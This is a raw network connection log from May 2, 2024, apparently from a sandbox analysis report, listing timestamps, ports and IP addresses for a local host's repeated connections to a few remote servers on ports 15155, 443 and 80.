May 2, 2024 06:01:32.023416996 CEST	443	49759	104.20.3.235	192.168.2.4
May 2, 2024 06:01:32.248651028 CEST	443	49759	104.20.3.235	192.168.2.4
May 2, 2024 06:01:32.248765945 CEST	443	49759	104.20.3.235	192.168.2.4
May 2, 2024 06:01:32.248816967 CEST	49759	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:32.249310017 CEST	49759	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:34.264113903 CEST	49760	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:01:34.433762074 CEST	15155	49760	18.192.31.165	192.168.2.4
May 2, 2024 06:01:34.934094906 CEST	49760	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:01:35.104276896 CEST	15155	49760	18.192.31.165	192.168.2.4
May 2, 2024 06:01:35.606019974 CEST	49760	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:01:35.775827885 CEST	15155	49760	18.192.31.165	192.168.2.4
May 2, 2024 06:01:36.277853012 CEST	49760	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:01:36.447921991 CEST	15155	49760	18.192.31.165	192.168.2.4
May 2, 2024 06:01:36.949103117 CEST	49760	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:01:37.118573904 CEST	15155	49760	18.192.31.165	192.168.2.4
May 2, 2024 06:01:37.119654894 CEST	49761	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:37.119704008 CEST	443	49761	104.20.3.235	192.168.2.4
May 2, 2024 06:01:37.119776964 CEST	49761	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:37.120167017 CEST	49761	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:37.120182037 CEST	443	49761	104.20.3.235	192.168.2.4
May 2, 2024 06:01:37.303627014 CEST	443	49761	104.20.3.235	192.168.2.4
May 2, 2024 06:01:37.305725098 CEST	49761	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:37.305748940 CEST	443	49761	104.20.3.235	192.168.2.4
May 2, 2024 06:01:37.538548946 CEST	443	49761	104.20.3.235	192.168.2.4
May 2, 2024 06:01:37.538670063 CEST	443	49761	104.20.3.235	192.168.2.4
May 2, 2024 06:01:37.538722992 CEST	49761	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:37.539391041 CEST	49761	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:39.548661947 CEST	49762	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:01:39.721735954 CEST	15155	49762	18.192.31.165	192.168.2.4
May 2, 2024 06:01:40.227402925 CEST	49762	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:01:40.395318985 CEST	15155	49762	18.192.31.165	192.168.2.4
May 2, 2024 06:01:40.903270006 CEST	49762	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:01:41.071135044 CEST	15155	49762	18.192.31.165	192.168.2.4
May 2, 2024 06:01:41.583817959 CEST	49762	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:01:41.751514912 CEST	15155	49762	18.192.31.165	192.168.2.4
May 2, 2024 06:01:42.253612995 CEST	49762	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:01:42.421545982 CEST	15155	49762	18.192.31.165	192.168.2.4
May 2, 2024 06:01:42.422384024 CEST	49763	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:42.422427893 CEST	443	49763	104.20.3.235	192.168.2.4
May 2, 2024 06:01:42.422496080 CEST	49763	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:42.422794104 CEST	49763	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:42.422806025 CEST	443	49763	104.20.3.235	192.168.2.4
May 2, 2024 06:01:42.605829954 CEST	443	49763	104.20.3.235	192.168.2.4
May 2, 2024 06:01:42.608324051 CEST	49763	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:42.608361006 CEST	443	49763	104.20.3.235	192.168.2.4
May 2, 2024 06:01:42.833523035 CEST	443	49763	104.20.3.235	192.168.2.4
May 2, 2024 06:01:42.833646059 CEST	443	49763	104.20.3.235	192.168.2.4
May 2, 2024 06:01:42.833703995 CEST	49763	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:42.834216118 CEST	49763	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:45.098644972 CEST	49764	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:01:45.267890930 CEST	15155	49764	18.192.31.165	192.168.2.4
May 2, 2024 06:01:45.779335976 CEST	49764	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:01:45.948319912 CEST	15155	49764	18.192.31.165	192.168.2.4
May 2, 2024 06:01:46.464591980 CEST	49764	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:01:46.635195017 CEST	15155	49764	18.192.31.165	192.168.2.4
May 2, 2024 06:01:47.136470079 CEST	49764	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:01:47.305607080 CEST	15155	49764	18.192.31.165	192.168.2.4
May 2, 2024 06:01:47.811589956 CEST	49764	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:01:47.980144024 CEST	15155	49764	18.192.31.165	192.168.2.4
May 2, 2024 06:01:47.981317997 CEST	49765	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:47.981363058 CEST	443	49765	104.20.3.235	192.168.2.4
May 2, 2024 06:01:47.981436968 CEST	49765	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:47.981842041 CEST	49765	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:47.981856108 CEST	443	49765	104.20.3.235	192.168.2.4
May 2, 2024 06:01:48.165251970 CEST	443	49765	104.20.3.235	192.168.2.4
May 2, 2024 06:01:48.167155981 CEST	49765	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:48.167182922 CEST	443	49765	104.20.3.235	192.168.2.4
May 2, 2024 06:01:48.391050100 CEST	443	49765	104.20.3.235	192.168.2.4
May 2, 2024 06:01:48.391155005 CEST	443	49765	104.20.3.235	192.168.2.4
May 2, 2024 06:01:48.391242981 CEST	49765	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:48.393131971 CEST	49765	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:50.403022051 CEST	49766	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:01:50.572875023 CEST	15155	49766	18.192.31.165	192.168.2.4
May 2, 2024 06:01:51.075423956 CEST	49766	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:01:51.245487928 CEST	15155	49766	18.192.31.165	192.168.2.4
May 2, 2024 06:01:51.746007919 CEST	49766	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:01:51.916023016 CEST	15155	49766	18.192.31.165	192.168.2.4
May 2, 2024 06:01:52.417870045 CEST	49766	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:01:52.587656021 CEST	15155	49766	18.192.31.165	192.168.2.4
May 2, 2024 06:01:53.089832067 CEST	49766	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:01:53.144150019 CEST	49767	443	192.168.2.4	40.68.123.157
May 2, 2024 06:01:53.144186020 CEST	443	49767	40.68.123.157	192.168.2.4
May 2, 2024 06:01:53.144242048 CEST	49767	443	192.168.2.4	40.68.123.157
May 2, 2024 06:01:53.144665956 CEST	49767	443	192.168.2.4	40.68.123.157
May 2, 2024 06:01:53.144680977 CEST	443	49767	40.68.123.157	192.168.2.4
May 2, 2024 06:01:53.259794950 CEST	15155	49766	18.192.31.165	192.168.2.4
May 2, 2024 06:01:53.261158943 CEST	49768	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:53.261198044 CEST	443	49768	104.20.3.235	192.168.2.4
May 2, 2024 06:01:53.261287928 CEST	49768	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:53.261780977 CEST	49768	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:53.261795044 CEST	443	49768	104.20.3.235	192.168.2.4
May 2, 2024 06:01:53.444127083 CEST	443	49768	104.20.3.235	192.168.2.4
May 2, 2024 06:01:53.445719957 CEST	49768	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:53.445758104 CEST	443	49768	104.20.3.235	192.168.2.4
May 2, 2024 06:01:53.660665989 CEST	443	49767	40.68.123.157	192.168.2.4
May 2, 2024 06:01:53.660840034 CEST	49767	443	192.168.2.4	40.68.123.157
May 2, 2024 06:01:53.664777040 CEST	49767	443	192.168.2.4	40.68.123.157
May 2, 2024 06:01:53.664783955 CEST	443	49767	40.68.123.157	192.168.2.4
May 2, 2024 06:01:53.665009022 CEST	443	49767	40.68.123.157	192.168.2.4
May 2, 2024 06:01:53.673134089 CEST	49767	443	192.168.2.4	40.68.123.157
May 2, 2024 06:01:53.675440073 CEST	443	49768	104.20.3.235	192.168.2.4
May 2, 2024 06:01:53.675558090 CEST	443	49768	104.20.3.235	192.168.2.4
May 2, 2024 06:01:53.675609112 CEST	49768	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:53.676230907 CEST	49768	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:53.720115900 CEST	443	49767	40.68.123.157	192.168.2.4
May 2, 2024 06:01:54.171442032 CEST	443	49767	40.68.123.157	192.168.2.4
May 2, 2024 06:01:54.171461105 CEST	443	49767	40.68.123.157	192.168.2.4
May 2, 2024 06:01:54.171520948 CEST	49767	443	192.168.2.4	40.68.123.157
May 2, 2024 06:01:54.171550035 CEST	443	49767	40.68.123.157	192.168.2.4
May 2, 2024 06:01:54.171605110 CEST	443	49767	40.68.123.157	192.168.2.4
May 2, 2024 06:01:54.171613932 CEST	49767	443	192.168.2.4	40.68.123.157
May 2, 2024 06:01:54.171653986 CEST	49767	443	192.168.2.4	40.68.123.157
May 2, 2024 06:01:54.171663046 CEST	443	49767	40.68.123.157	192.168.2.4
May 2, 2024 06:01:54.171686888 CEST	49767	443	192.168.2.4	40.68.123.157
May 2, 2024 06:01:54.171694994 CEST	443	49767	40.68.123.157	192.168.2.4
May 2, 2024 06:01:54.171726942 CEST	49767	443	192.168.2.4	40.68.123.157
May 2, 2024 06:01:54.171730042 CEST	443	49767	40.68.123.157	192.168.2.4
May 2, 2024 06:01:54.171785116 CEST	49767	443	192.168.2.4	40.68.123.157
May 2, 2024 06:01:54.176755905 CEST	49767	443	192.168.2.4	40.68.123.157
May 2, 2024 06:01:54.176774025 CEST	443	49767	40.68.123.157	192.168.2.4
May 2, 2024 06:01:54.176793098 CEST	49767	443	192.168.2.4	40.68.123.157
May 2, 2024 06:01:54.176799059 CEST	443	49767	40.68.123.157	192.168.2.4
May 2, 2024 06:01:55.684030056 CEST	49769	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:01:55.851967096 CEST	15155	49769	18.192.31.165	192.168.2.4
May 2, 2024 06:01:56.354778051 CEST	49769	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:01:56.523699999 CEST	15155	49769	18.192.31.165	192.168.2.4
May 2, 2024 06:01:57.026509047 CEST	49769	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:01:57.193941116 CEST	15155	49769	18.192.31.165	192.168.2.4
May 2, 2024 06:01:57.698765993 CEST	49769	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:01:57.866282940 CEST	15155	49769	18.192.31.165	192.168.2.4
May 2, 2024 06:01:58.370595932 CEST	49769	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:01:58.538144112 CEST	15155	49769	18.192.31.165	192.168.2.4
May 2, 2024 06:01:59.126084089 CEST	49770	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:59.126190901 CEST	443	49770	104.20.3.235	192.168.2.4
May 2, 2024 06:01:59.126391888 CEST	49770	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:59.269774914 CEST	49770	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:59.269845009 CEST	443	49770	104.20.3.235	192.168.2.4
May 2, 2024 06:01:59.458064079 CEST	443	49770	104.20.3.235	192.168.2.4
May 2, 2024 06:01:59.459676981 CEST	49770	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:59.459734917 CEST	443	49770	104.20.3.235	192.168.2.4
May 2, 2024 06:01:59.686455965 CEST	443	49770	104.20.3.235	192.168.2.4
May 2, 2024 06:01:59.686568022 CEST	443	49770	104.20.3.235	192.168.2.4
May 2, 2024 06:01:59.686639071 CEST	49770	443	192.168.2.4	104.20.3.235
May 2, 2024 06:01:59.693654060 CEST	49770	443	192.168.2.4	104.20.3.235
May 2, 2024 06:02:01.700673103 CEST	49772	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:02:01.870594978 CEST	15155	49772	18.192.31.165	192.168.2.4
May 2, 2024 06:02:02.386549950 CEST	49772	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:02:02.556096077 CEST	15155	49772	18.192.31.165	192.168.2.4
May 2, 2024 06:02:03.058552027 CEST	49772	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:02:03.228116035 CEST	15155	49772	18.192.31.165	192.168.2.4
May 2, 2024 06:02:03.367548943 CEST	49773	443	192.168.2.4	142.251.40.228
May 2, 2024 06:02:03.367602110 CEST	443	49773	142.251.40.228	192.168.2.4
May 2, 2024 06:02:03.367672920 CEST	49773	443	192.168.2.4	142.251.40.228
May 2, 2024 06:02:03.367893934 CEST	49773	443	192.168.2.4	142.251.40.228
May 2, 2024 06:02:03.367909908 CEST	443	49773	142.251.40.228	192.168.2.4
May 2, 2024 06:02:03.626310110 CEST	443	49773	142.251.40.228	192.168.2.4
May 2, 2024 06:02:03.626702070 CEST	49773	443	192.168.2.4	142.251.40.228
May 2, 2024 06:02:03.626722097 CEST	443	49773	142.251.40.228	192.168.2.4
May 2, 2024 06:02:03.627084970 CEST	443	49773	142.251.40.228	192.168.2.4
May 2, 2024 06:02:03.627346992 CEST	49773	443	192.168.2.4	142.251.40.228
May 2, 2024 06:02:03.627420902 CEST	443	49773	142.251.40.228	192.168.2.4
May 2, 2024 06:02:03.682027102 CEST	49773	443	192.168.2.4	142.251.40.228
May 2, 2024 06:02:03.740757942 CEST	49772	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:02:03.910454035 CEST	15155	49772	18.192.31.165	192.168.2.4
May 2, 2024 06:02:04.417702913 CEST	49772	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:02:04.587145090 CEST	15155	49772	18.192.31.165	192.168.2.4
May 2, 2024 06:02:04.588766098 CEST	49774	443	192.168.2.4	104.20.3.235
May 2, 2024 06:02:04.588800907 CEST	443	49774	104.20.3.235	192.168.2.4
May 2, 2024 06:02:04.588879108 CEST	49774	443	192.168.2.4	104.20.3.235
May 2, 2024 06:02:04.589390039 CEST	49774	443	192.168.2.4	104.20.3.235
May 2, 2024 06:02:04.589401960 CEST	443	49774	104.20.3.235	192.168.2.4
May 2, 2024 06:02:04.770494938 CEST	443	49774	104.20.3.235	192.168.2.4
May 2, 2024 06:02:04.774591923 CEST	49774	443	192.168.2.4	104.20.3.235
May 2, 2024 06:02:04.774622917 CEST	443	49774	104.20.3.235	192.168.2.4
May 2, 2024 06:02:04.997065067 CEST	443	49774	104.20.3.235	192.168.2.4
May 2, 2024 06:02:04.997169971 CEST	443	49774	104.20.3.235	192.168.2.4
May 2, 2024 06:02:04.997230053 CEST	49774	443	192.168.2.4	104.20.3.235
May 2, 2024 06:02:04.997983932 CEST	49774	443	192.168.2.4	104.20.3.235
May 2, 2024 06:02:07.405298948 CEST	49775	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:02:07.573750973 CEST	15155	49775	18.192.31.165	192.168.2.4
May 2, 2024 06:02:08.076814890 CEST	49775	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:02:08.245294094 CEST	15155	49775	18.192.31.165	192.168.2.4
May 2, 2024 06:02:08.748694897 CEST	49775	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:02:08.917205095 CEST	15155	49775	18.192.31.165	192.168.2.4
May 2, 2024 06:02:09.108696938 CEST	49723	80	192.168.2.4	199.232.214.172
May 2, 2024 06:02:09.108892918 CEST	49724	80	192.168.2.4	199.232.214.172
May 2, 2024 06:02:09.195738077 CEST	80	49723	199.232.214.172	192.168.2.4
May 2, 2024 06:02:09.195755959 CEST	80	49723	199.232.214.172	192.168.2.4
May 2, 2024 06:02:09.195766926 CEST	80	49724	199.232.214.172	192.168.2.4
May 2, 2024 06:02:09.195818901 CEST	49723	80	192.168.2.4	199.232.214.172
May 2, 2024 06:02:09.195976973 CEST	80	49724	199.232.214.172	192.168.2.4
May 2, 2024 06:02:09.196149111 CEST	49724	80	192.168.2.4	199.232.214.172
May 2, 2024 06:02:09.420758963 CEST	49775	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:02:09.589956045 CEST	15155	49775	18.192.31.165	192.168.2.4
May 2, 2024 06:02:10.092603922 CEST	49775	15155	192.168.2.4	18.192.31.165
May 2, 2024 06:02:10.261085033 CEST	15155	49775	18.192.31.165	192.168.2.4
May 2, 2024 06:02:10.333359003 CEST	49776	443	192.168.2.4	104.20.3.235
May 2, 2024 06:02:10.333426952 CEST	443	49776	104.20.3.235	192.168.2.4
May 2, 2024 06:02:10.333640099 CEST	49776	443	192.168.2.4	104.20.3.235
May 2, 2024 06:02:10.339164972 CEST	49776	443	192.168.2.4	104.20.3.235
May 2, 2024 06:02:10.339179993 CEST	443	49776	104.20.3.235	192.168.2.4
May 2, 2024 06:02:10.520293951 CEST	443	49776	104.20.3.235	192.168.2.4
May 2, 2024 06:02:10.567404985 CEST	49776	443	192.168.2.4	104.20.3.235
May 2, 2024 06:02:11.488322973 CEST	49776	443	192.168.2.4	104.20.3.235
May 2, 2024 06:02:11.488401890 CEST	443	49776	104.20.3.235	192.168.2.4
May 2, 2024 06:02:11.588221073 CEST	443	49776	104.20.3.235	192.168.2.4
May 2, 2024 06:02:11.588360071 CEST	443	49776	104.20.3.235	192.168.2.4
May 2, 2024 06:02:11.588424921 CEST	49776	443	192.168.2.4	104.20.3.235
May 2, 2024 06:02:11.589041948 CEST	49776	443	192.168.2.4	104.20.3.235
May 2, 2024 06:02:13.626635075 CEST	443	49773	142.251.40.228	192.168.2.4
May 2, 2024 06:02:13.626705885 CEST	443	49773	142.251.40.228	192.168.2.4
May 2, 2024 06:02:13.626847029 CEST	49773	443	192.168.2.4	142.251.40.228
May 2, 2024 06:02:13.682359934 CEST	49777	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:02:13.852036953 CEST	15155	49777	3.124.142.205	192.168.2.4
May 2, 2024 06:02:14.353576899 CEST	49777	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:02:14.523328066 CEST	15155	49777	3.124.142.205	192.168.2.4
May 2, 2024 06:02:15.031470060 CEST	49777	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:02:15.201308966 CEST	15155	49777	3.124.142.205	192.168.2.4
May 2, 2024 06:02:15.592421055 CEST	49773	443	192.168.2.4	142.251.40.228
May 2, 2024 06:02:15.592438936 CEST	443	49773	142.251.40.228	192.168.2.4
May 2, 2024 06:02:15.714374065 CEST	49777	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:02:15.884237051 CEST	15155	49777	3.124.142.205	192.168.2.4
May 2, 2024 06:02:16.386379957 CEST	49777	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:02:16.556509972 CEST	15155	49777	3.124.142.205	192.168.2.4
May 2, 2024 06:02:16.557792902 CEST	49778	443	192.168.2.4	104.20.3.235
May 2, 2024 06:02:16.557830095 CEST	443	49778	104.20.3.235	192.168.2.4
May 2, 2024 06:02:16.557914972 CEST	49778	443	192.168.2.4	104.20.3.235
May 2, 2024 06:02:16.558708906 CEST	49778	443	192.168.2.4	104.20.3.235
May 2, 2024 06:02:16.558722019 CEST	443	49778	104.20.3.235	192.168.2.4
May 2, 2024 06:02:16.740963936 CEST	443	49778	104.20.3.235	192.168.2.4
May 2, 2024 06:02:16.742825031 CEST	49778	443	192.168.2.4	104.20.3.235
May 2, 2024 06:02:16.742852926 CEST	443	49778	104.20.3.235	192.168.2.4
May 2, 2024 06:02:16.968579054 CEST	443	49778	104.20.3.235	192.168.2.4
May 2, 2024 06:02:16.968683004 CEST	443	49778	104.20.3.235	192.168.2.4
May 2, 2024 06:02:16.968741894 CEST	49778	443	192.168.2.4	104.20.3.235
May 2, 2024 06:02:16.969985962 CEST	49778	443	192.168.2.4	104.20.3.235
May 2, 2024 06:02:18.982559919 CEST	49779	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:02:19.150489092 CEST	15155	49779	3.124.142.205	192.168.2.4
May 2, 2024 06:02:19.657010078 CEST	49779	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:02:19.824769974 CEST	15155	49779	3.124.142.205	192.168.2.4
May 2, 2024 06:02:20.339422941 CEST	49779	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:02:20.507083893 CEST	15155	49779	3.124.142.205	192.168.2.4
May 2, 2024 06:02:21.011606932 CEST	49779	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:02:21.179280043 CEST	15155	49779	3.124.142.205	192.168.2.4
May 2, 2024 06:02:21.683475971 CEST	49779	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:02:21.851154089 CEST	15155	49779	3.124.142.205	192.168.2.4
May 2, 2024 06:02:21.853426933 CEST	49780	443	192.168.2.4	104.20.3.235
May 2, 2024 06:02:21.853462934 CEST	443	49780	104.20.3.235	192.168.2.4
May 2, 2024 06:02:21.853518963 CEST	49780	443	192.168.2.4	104.20.3.235
May 2, 2024 06:02:21.854012966 CEST	49780	443	192.168.2.4	104.20.3.235
May 2, 2024 06:02:21.854031086 CEST	443	49780	104.20.3.235	192.168.2.4
May 2, 2024 06:02:22.039330006 CEST	443	49780	104.20.3.235	192.168.2.4
May 2, 2024 06:02:22.041312933 CEST	49780	443	192.168.2.4	104.20.3.235
May 2, 2024 06:02:22.041352987 CEST	443	49780	104.20.3.235	192.168.2.4
May 2, 2024 06:02:22.267285109 CEST	443	49780	104.20.3.235	192.168.2.4
May 2, 2024 06:02:22.267386913 CEST	443	49780	104.20.3.235	192.168.2.4
May 2, 2024 06:02:22.267477036 CEST	49780	443	192.168.2.4	104.20.3.235
May 2, 2024 06:02:22.269823074 CEST	49780	443	192.168.2.4	104.20.3.235
May 2, 2024 06:02:24.279011011 CEST	49781	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:02:24.447371006 CEST	15155	49781	3.124.142.205	192.168.2.4
May 2, 2024 06:02:24.948786974 CEST	49781	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:02:25.117289066 CEST	15155	49781	3.124.142.205	192.168.2.4
May 2, 2024 06:02:25.620877981 CEST	49781	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:02:25.791122913 CEST	15155	49781	3.124.142.205	192.168.2.4
May 2, 2024 06:02:26.292362928 CEST	49781	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:02:26.461740017 CEST	15155	49781	3.124.142.205	192.168.2.4
May 2, 2024 06:02:26.965292931 CEST	49781	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:02:27.133687973 CEST	15155	49781	3.124.142.205	192.168.2.4
May 2, 2024 06:02:27.142024040 CEST	49782	443	192.168.2.4	104.20.3.235
May 2, 2024 06:02:27.142077923 CEST	443	49782	104.20.3.235	192.168.2.4
May 2, 2024 06:02:27.142132044 CEST	49782	443	192.168.2.4	104.20.3.235
May 2, 2024 06:02:27.143080950 CEST	49782	443	192.168.2.4	104.20.3.235
May 2, 2024 06:02:27.143095016 CEST	443	49782	104.20.3.235	192.168.2.4
May 2, 2024 06:02:27.324270010 CEST	443	49782	104.20.3.235	192.168.2.4
May 2, 2024 06:02:27.327403069 CEST	49782	443	192.168.2.4	104.20.3.235
May 2, 2024 06:02:27.327431917 CEST	443	49782	104.20.3.235	192.168.2.4
May 2, 2024 06:02:27.554610968 CEST	443	49782	104.20.3.235	192.168.2.4
May 2, 2024 06:02:27.554764032 CEST	443	49782	104.20.3.235	192.168.2.4
May 2, 2024 06:02:27.554852962 CEST	49782	443	192.168.2.4	104.20.3.235
May 2, 2024 06:02:27.557234049 CEST	49782	443	192.168.2.4	104.20.3.235
May 2, 2024 06:02:29.577698946 CEST	49784	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:02:29.746252060 CEST	15155	49784	3.124.142.205	192.168.2.4
May 2, 2024 06:02:30.246009111 CEST	49784	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:02:30.414025068 CEST	15155	49784	3.124.142.205	192.168.2.4
May 2, 2024 06:02:30.917866945 CEST	49784	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:02:31.085598946 CEST	15155	49784	3.124.142.205	192.168.2.4
May 2, 2024 06:02:31.589956045 CEST	49784	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:02:31.757735014 CEST	15155	49784	3.124.142.205	192.168.2.4
May 2, 2024 06:02:32.265836954 CEST	49784	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:02:32.433795929 CEST	15155	49784	3.124.142.205	192.168.2.4
May 2, 2024 06:02:32.436714888 CEST	49785	443	192.168.2.4	104.20.3.235
May 2, 2024 06:02:32.436769009 CEST	443	49785	104.20.3.235	192.168.2.4
May 2, 2024 06:02:32.436924934 CEST	49785	443	192.168.2.4	104.20.3.235
May 2, 2024 06:02:32.437563896 CEST	49785	443	192.168.2.4	104.20.3.235
May 2, 2024 06:02:32.437577009 CEST	443	49785	104.20.3.235	192.168.2.4
May 2, 2024 06:02:32.621325016 CEST	443	49785	104.20.3.235	192.168.2.4
May 2, 2024 06:02:32.623646975 CEST	49785	443	192.168.2.4	104.20.3.235
May 2, 2024 06:02:32.623672962 CEST	443	49785	104.20.3.235	192.168.2.4
May 2, 2024 06:02:32.851361036 CEST	443	49785	104.20.3.235	192.168.2.4
May 2, 2024 06:02:32.851486921 CEST	443	49785	104.20.3.235	192.168.2.4
May 2, 2024 06:02:32.851738930 CEST	49785	443	192.168.2.4	104.20.3.235
May 2, 2024 06:02:32.853679895 CEST	49785	443	192.168.2.4	104.20.3.235
May 2, 2024 06:02:34.861067057 CEST	49786	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:02:35.028603077 CEST	15155	49786	3.124.142.205	192.168.2.4
May 2, 2024 06:02:35.542648077 CEST	49786	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:02:35.710095882 CEST	15155	49786	3.124.142.205	192.168.2.4
May 2, 2024 06:02:36.214449883 CEST	49786	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:02:36.382014990 CEST	15155	49786	3.124.142.205	192.168.2.4
May 2, 2024 06:02:36.886316061 CEST	49786	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:02:37.053829908 CEST	15155	49786	3.124.142.205	192.168.2.4
May 2, 2024 06:02:37.557692051 CEST	49786	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:02:37.725925922 CEST	15155	49786	3.124.142.205	192.168.2.4
May 2, 2024 06:02:38.153110027 CEST	49787	443	192.168.2.4	104.20.3.235
May 2, 2024 06:02:38.153152943 CEST	443	49787	104.20.3.235	192.168.2.4
May 2, 2024 06:02:38.153239012 CEST	49787	443	192.168.2.4	104.20.3.235
May 2, 2024 06:02:38.153631926 CEST	49787	443	192.168.2.4	104.20.3.235
May 2, 2024 06:02:38.153645039 CEST	443	49787	104.20.3.235	192.168.2.4
May 2, 2024 06:02:38.342279911 CEST	443	49787	104.20.3.235	192.168.2.4
May 2, 2024 06:02:38.344337940 CEST	49787	443	192.168.2.4	104.20.3.235
May 2, 2024 06:02:38.344367981 CEST	443	49787	104.20.3.235	192.168.2.4
May 2, 2024 06:02:38.568655968 CEST	443	49787	104.20.3.235	192.168.2.4
May 2, 2024 06:02:38.568774939 CEST	443	49787	104.20.3.235	192.168.2.4
May 2, 2024 06:02:38.568876028 CEST	49787	443	192.168.2.4	104.20.3.235
May 2, 2024 06:02:38.583072901 CEST	49787	443	192.168.2.4	104.20.3.235
May 2, 2024 06:02:40.595437050 CEST	49788	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:02:40.763478994 CEST	15155	49788	3.124.142.205	192.168.2.4
May 2, 2024 06:02:41.277096987 CEST	49788	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:02:41.445064068 CEST	15155	49788	3.124.142.205	192.168.2.4
May 2, 2024 06:02:41.961747885 CEST	49788	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:02:42.129419088 CEST	15155	49788	3.124.142.205	192.168.2.4
May 2, 2024 06:02:42.640908003 CEST	49788	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:02:42.808670998 CEST	15155	49788	3.124.142.205	192.168.2.4
May 2, 2024 06:02:43.340781927 CEST	49788	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:02:43.508497953 CEST	15155	49788	3.124.142.205	192.168.2.4
May 2, 2024 06:02:43.512048960 CEST	49789	443	192.168.2.4	104.20.3.235
May 2, 2024 06:02:43.512106895 CEST	443	49789	104.20.3.235	192.168.2.4
May 2, 2024 06:02:43.512186050 CEST	49789	443	192.168.2.4	104.20.3.235
May 2, 2024 06:02:43.513314009 CEST	49789	443	192.168.2.4	104.20.3.235
May 2, 2024 06:02:43.513329029 CEST	443	49789	104.20.3.235	192.168.2.4
May 2, 2024 06:02:43.695525885 CEST	443	49789	104.20.3.235	192.168.2.4
May 2, 2024 06:02:43.699254036 CEST	49789	443	192.168.2.4	104.20.3.235
May 2, 2024 06:02:43.699282885 CEST	443	49789	104.20.3.235	192.168.2.4
May 2, 2024 06:02:43.928122044 CEST	443	49789	104.20.3.235	192.168.2.4
May 2, 2024 06:02:43.928245068 CEST	443	49789	104.20.3.235	192.168.2.4
May 2, 2024 06:02:43.928319931 CEST	49789	443	192.168.2.4	104.20.3.235
